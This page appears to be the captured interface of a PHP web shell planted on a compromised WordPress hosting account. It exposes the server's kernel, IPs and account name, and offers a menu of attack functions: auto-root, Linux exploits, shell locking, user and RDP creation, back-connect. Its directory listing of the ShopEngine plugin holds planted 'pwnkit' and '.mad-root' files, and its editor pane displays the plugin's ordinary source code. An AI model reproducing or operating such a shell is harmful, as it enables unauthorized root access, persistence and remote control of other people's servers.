Linux webm019.cluster128.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
Apache
: 10.128.20.19 | : 216.73.216.176
Cant Read [ /etc/named.conf ]
8.0.30
nicedoo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
nicedoo /
www /
wp-content /
plugins /
shopengine /
[ HOME SHELL ]
Name
Size
Permission
Action
assets
[ DIR ]
drwxr-xr-x
base
[ DIR ]
drwxr-xr-x
compatibility
[ DIR ]
drwxr-xr-x
core
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
libs
[ DIR ]
drwxr-xr-x
modules
[ DIR ]
drwxr-xr-x
traits
[ DIR ]
drwxr-xr-x
utils
[ DIR ]
drwxr-xr-x
widgets
[ DIR ]
drwxr-xr-x
woocommerce
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
autoloader.php
944
B
-rw-r--r--
phpcs.xml
3.71
KB
-rw-r--r--
plugin.php
12.92
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
readme.txt
93.13
KB
-rw-r--r--
shopengine.php
6.03
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : shopengine.php
<?php /** * Plugin Name: ShopEngine * Plugin URI: https://wpmet.com/plugin/shopengine * Description: ShopEngine is the most-complete WooCommerce template builder for Elementor. It helps you build and customize the single product page, cart page, archive page, checkout page, order page, my account page, and thank-you page from scratch. It also packed with product comparison, wishlist, quick view, and variation swatches etc. * Version: 4.6.1 * Author: Wpmet * Author URI: https://wpmet.com * Text Domain: shopengine * Domain Path: /languages * License: GPLv3 * License URI: https://www.gnu.org/licenses/gpl-3.0.txt */ defined('ABSPATH') || exit; require_once __DIR__ . '/autoloader.php'; require_once __DIR__ . '/utils/global-helper.php'; require_once plugin_dir_path( __FILE__ ) . 'utils/notice.php'; require_once plugin_dir_path( __FILE__ ) . 'utils/notice/notice.php'; require_once plugin_dir_path( __FILE__ ) . 'utils/banner/banner.php'; require_once plugin_dir_path( __FILE__ ) . 'utils/stories/stories.php'; require_once plugin_dir_path( __FILE__ ) . 'utils/pro-awareness/pro-awareness.php'; final class ShopEngine { const SHOPENGINE_PREFIX = 'shopengine-builder'; /** * Plugin Version * * @return string * @since 1.0.0 * */ public static function version() { return '4.6.1'; } /** * Package type * * @return string * @since 1.0.0 * */ public static function package_type() { return apply_filters('shopengine/core/package_type', 'free'); } public static function landing_page($part = 'pricing') { $site = trailingslashit('https://wpmet.com/plugin/shopengine/' . $part); return $site; } static function license_status() { if(!class_exists('ShopEngine_Pro')) { return 'invalid'; } if(ShopEngine\Libs\License\Helper::instance()->status() != 'valid') { return 'invalid'; } return 'valid'; } public static function license_data() { if(!class_exists('\ElementsKit_Lite\Libs\Framework\Classes\Utils')) { return [ 'key' => '', 'checksum' => '', 'plugin_package' => self::package_type(), ]; } return array_merge( ShopEngine\Libs\License\Helper::instance()->get_license(), ['plugin_package' => self::package_type()] ); } /** * Product ID * * @return string * @since 1.0.0 * */ static function product_id() { return '0'; } /** * Plugin Author Name * * @return string * @since 1.0.0 * */ static function author_name() { return 'Wpmet'; } public static function store_name() { return 'wpmet'; } /** * Minimum Elementor Version required to run the plugin. * * @return string * @since 1.0.0 * */ public static function min_el_version() { return '3.0.0'; } /** * Minimum PHP Version required to run the plugin * * @return string * @since 1.0.0 * */ public static function min_php_version() { return '7.0'; } /** * Minimum Woocommerce version required to run the plugin. * * @return string * @since 1.0.0 * */ public static function min_woo_version() { return '4.1'; } /** * Plugin file plugins's root file. * * @return string * @since 1.0.0 * */ public static function plugin_file() { return __FILE__; } /** * Plugin url * * @return mixed * @since 1.0.0 */ public static function plugin_url() { return trailingslashit(plugin_dir_url(__FILE__)); } /** * Plugin dir * * @return mixed * @since 1.0.0 */ public static function plugin_dir() { return trailingslashit(plugin_dir_path(__FILE__)); } /** * Plugin's widget directory. * * @return string * @since 1.0.0 */ public static function widget_dir() { return self::plugin_dir() . 'widgets/'; } /** * Plugin's widget url. * * @return string * @since 1.0.0 */ public static function widget_url() { return self::plugin_url() . 'widgets/'; } /** * Plugin's widget directory. * * @return string * @since 1.0.0 */ public static function module_dir() { return self::plugin_dir() . 'modules/'; } /** * Plugin's widget url. * * @return string * @since 1.0.0 */ public static function module_url() { return self::plugin_url() . 'modules/'; } /** * Plugin core directory * * @return string * @since 1.0.0 */ public static function core_dir() { return self::plugin_dir() . 'core/'; } /** * Plugin core url * * @return string * @since 1.0.0 */ public static function core_url() { return self::plugin_url() . 'core/'; } /** * * @return string * @since 1.0.0 */ public static function views_dir() { return self::plugin_dir() . 'views/'; } /** * Constructor * * @since 1.0.0 * @access public */ public function __construct() { add_action('init', [$this, 'i18n']); add_action('plugins_loaded', [$this, 'init'], 100); } /** * Load text domain * * Load plugin localization files. * Fired by `init` action hook. * * @since 1.0.0 * @access public */ public function i18n() { load_plugin_textdomain('shopengine', false, self::plugin_dir() . 'languages/'); } public function init() { do_action('shopengine/before_loaded'); // Declaring compatibility with custom order tables for the WooCommerce plugin. add_action( 'before_woocommerce_init', [ $this, 'woocommerce_custom_order_table_compatibility' ] ); ShopEngine\Plugin::instance()->init(); do_action('shopengine/after_loaded'); } /** * Compatibility with custom order tables for the WooCommerce plugin * * @since 4.2.1 * @access public * @return void */ public function woocommerce_custom_order_table_compatibility(){ if ( class_exists( \Automattic\WooCommerce\Utilities\FeaturesUtil::class ) ) { \Automattic\WooCommerce\Utilities\FeaturesUtil::declare_compatibility( 'custom_order_tables', __FILE__, true ); } } } new ShopEngine(); function activate_shopengine() { \ShopEngine\Core\Template_Cpt::instance()->init(); flush_rewrite_rules(); } function deactivate_shopengine() {} register_activation_hook(__FILE__, 'activate_shopengine'); register_deactivation_hook(__FILE__, 'deactivate_shopengine');
Close